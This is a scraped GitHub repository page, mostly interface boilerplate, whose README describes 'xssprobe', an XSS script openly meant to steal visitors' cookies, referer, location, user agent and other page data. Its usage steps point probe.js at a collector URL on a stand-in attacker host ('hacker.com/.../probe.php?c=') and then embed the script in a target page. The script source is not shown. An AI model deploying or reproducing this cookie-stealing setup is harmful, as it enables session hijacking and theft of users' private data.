xss probe to steal page info: browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash, etc.
evilcos/xssprobe
master
Name already in use
Code
-
Clone
Use Git or checkout with SVN using the web URL.
Work fast with our official CLI. Learn more about the CLI.
- Open with GitHub Desktop
- Download ZIP
Sign In Required
Please sign in to use Codespaces.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching Xcode
If nothing happens, download Xcode and try again.
Launching Visual Studio Code
Your codespace will open once ready.
There was a problem preparing your codespace, please try again.
xssprobe xss探针脚本,用于获取被跨页面的通用数据。 使用说明: 1、修改probe.js: // 获取隐私信息的服务端页面,这里需配置为自己的probe.php网址 http_server = "http://www.hacker.com/xssprobe/probe.php?c="; 2、在目标页面嵌入probe.js文件,可以参考demo.html(xssprobe demo page):) by evilcos@gmail.com ChangeLog ===================================== 2011/8/22 v1 能获取的数据如下: browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash
About
xss probe to steal page info: browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash, etc.